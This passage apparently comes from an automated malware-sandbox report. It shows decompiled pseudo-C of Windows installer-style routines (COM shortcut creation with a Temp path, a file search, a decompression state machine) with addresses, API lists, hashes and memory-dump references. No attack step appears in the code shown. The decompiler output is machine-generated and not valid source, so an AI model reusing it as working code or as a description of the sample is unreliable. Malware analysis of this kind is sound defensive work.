					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
						_t95 =  *((intOrPtr*)(_t111 - 0x40));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x44)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x4c)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x10), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x1c));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x1c));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                                                                    0x00402141
                                                                                                                                    0x0040214b
                                                                                                                                    0x00402155
                                                                                                                                    0x0040215f
                                                                                                                                    0x0040216a
                                                                                                                                    0x0040216d
                                                                                                                                    0x00402187
                                                                                                                                    0x0040218d
                                                                                                                                    0x00402193
                                                                                                                                    0x00402196
                                                                                                                                    0x004021a0
                                                                                                                                    0x004021a4
                                                                                                                                    0x004021a4
                                                                                                                                    0x004021a9
                                                                                                                                    0x004021ba
                                                                                                                                    0x004021c2
                                                                                                                                    0x0040229b
                                                                                                                                    0x0040229b
                                                                                                                                    0x004022a2
                                                                                                                                    0x004021c8
                                                                                                                                    0x004021c8
                                                                                                                                    0x004021d7
                                                                                                                                    0x004021db
                                                                                                                                    0x004021de
                                                                                                                                    0x004021e4
                                                                                                                                    0x004021f2
                                                                                                                                    0x004021f5
                                                                                                                                    0x004021f7
                                                                                                                                    0x00402202
                                                                                                                                    0x00402202
                                                                                                                                    0x00402207
                                                                                                                                    0x00402209
                                                                                                                                    0x00402210
                                                                                                                                    0x00402210
                                                                                                                                    0x00402213
                                                                                                                                    0x0040221c
                                                                                                                                    0x0040221f
                                                                                                                                    0x00402224
                                                                                                                                    0x00402226
                                                                                                                                    0x00402233
                                                                                                                                    0x00402233
                                                                                                                                    0x00402236
                                                                                                                                    0x0040223f
                                                                                                                                    0x00402242
                                                                                                                                    0x0040224b
                                                                                                                                    0x00402251
                                                                                                                                    0x00402258
                                                                                                                                    0x00402271
                                                                                                                                    0x00402273
                                                                                                                                    0x00402281
                                                                                                                                    0x00402281
                                                                                                                                    0x00402271
                                                                                                                                    0x00402284
                                                                                                                                    0x0040228a
                                                                                                                                    0x0040228a
                                                                                                                                    0x0040228d
                                                                                                                                    0x00402293
                                                                                                                                    0x00402299
                                                                                                                                    0x004022ae
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402299
                                                                                                                                    0x004022a4
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 004021FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                    • API String ID: 123533781-47812868
                                                                                                                                    • Opcode ID: 074aa74a633204b349dfaef429f1ea974b099983f4015dcd1ad602f9d2c28e45
                                                                                                                                    • Instruction ID: c9eb5a0285b6c18ff98b66adf5edf6554836ffee9497b9f5b4e2a9baf3a30135
                                                                                                                                    • Opcode Fuzzy Hash: 074aa74a633204b349dfaef429f1ea974b099983f4015dcd1ad602f9d2c28e45
                                                                                                                                    • Instruction Fuzzy Hash: DD510671A00209AFCB04DFE4C988A9DBBB5FF48314F2085BAF915EB2D1DB799941CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402765, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00402765(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402B2C(2), _t19 - 0x1c8) != 0xffffffff) {
					E004060C4(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00406166();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                                    0x0040277d
                                                                                                                                    0x00402791
                                                                                                                                    0x0040279c
                                                                                                                                    0x0040279d
                                                                                                                                    0x004028d6
                                                                                                                                    0x0040277f
                                                                                                                                    0x0040277f
                                                                                                                                    0x00402781
                                                                                                                                    0x00402783
                                                                                                                                    0x00402783
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: 5dfb7db3aa25f5f4eb8cb2b3012c23c56794740afcaac6fc94cd1099ea738032
                                                                                                                                    • Instruction ID: 424f2c6ddb1572e7c5ce02535b77565719a00b3c54d6262f0fbb9de2ffc42380
                                                                                                                                    • Opcode Fuzzy Hash: 5dfb7db3aa25f5f4eb8cb2b3012c23c56794740afcaac6fc94cd1099ea738032
                                                                                                                                    • Instruction Fuzzy Hash: EDF0E5726441009BD301EBB49A49AFEB77CAF21324FA0017BE241F31C1D6F88949D76A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406943, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E00406943(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408400; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408400; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407072))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a400 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a400 + __eax * 2) & 0x0000ffff =  *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a400 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a400 + __eax * 2) & 0x0000ffff =  *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3b0;
												if( *0x42e3b0 != 0) {
													L22:
													_t412 =  *0x40a424; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a428; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d22c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d228; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d230;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6b0;
													if(_t416 < 0x42d6b0) {
														L15:
														__eflags = _t416 - 0x42d46c;
														_t438 = 8;
														if(_t416 > 0x42d46c) {
															__eflags = _t416 - 0x42d630;
															if(_t416 >= 0x42d630) {
																__eflags = _t416 - 0x42d690;
																if(_t416 < 0x42d690) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711A(0x42d230, 0x120, 0x101, 0x408414, 0x408454, 0x42d22c, 0x40a424, 0x42db30, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d230, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d230 + _t440;
														E0040711A(0x42d230, 0x1e, 0, 0x408494, 0x4084d0, 0x42d228, 0x40a428, 0x42db30, _t448 - 8);
														 *0x42e3b0 =  *0x42e3b0 + 1;
														__eflags =  *0x42e3b0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405CBA( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
